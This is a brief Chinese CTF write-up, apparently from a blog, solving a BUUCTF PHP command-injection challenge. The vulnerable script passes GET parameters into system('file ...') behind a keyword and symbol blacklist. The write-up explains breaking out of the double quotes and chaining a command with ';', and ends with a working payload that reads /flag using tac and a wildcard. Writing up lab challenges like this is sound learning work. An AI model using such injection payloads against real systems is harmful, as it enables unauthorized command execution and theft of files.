buu后边的题有些确实难，有些其实也没那么复杂。昨天做一道异或绕过的题，现在还没看懂QAQ

先来一题简单的吧。哎，随缘更新吧

<?php

highlight_file(__FILE__);

$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];


if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
    $comm1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
    $comm2 = "";

$flag = "#flag in /flag";

$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';

$cmd = "file $comm1 $comm2";
system($cmd);
?>

代码很简单过滤一些符号与关键字。但是最后system执行的是file命令。file命令作用大致是查看文件类型。首先可考虑到命令连接符。这里应该就是";"

可以传入两个参数，因为俩参数都会连接上双引号，先要进行双引号闭合。这样一看似乎第二个参数就不需要了

$cmd = "file $comm1 $comm2";
--输入a,b-->
$cmd = " file "a" "b" ";
--输入"a","b"-->
$cmd = " file ""a"" ""b"" ";
--将a替换为;tac /fla?;-->
$cmd = " file "";tac /fla?;"" ""b"" ";
--丢弃b参数也可以-->
$cmd = " file "";tac /fla?;"" "" ";

千万不能少了后边的双引号与分号，要闭合完整，才能执行恶意命令

最后的payload很简单了
?comm1=";tac%20/fla?;"

还挺简单的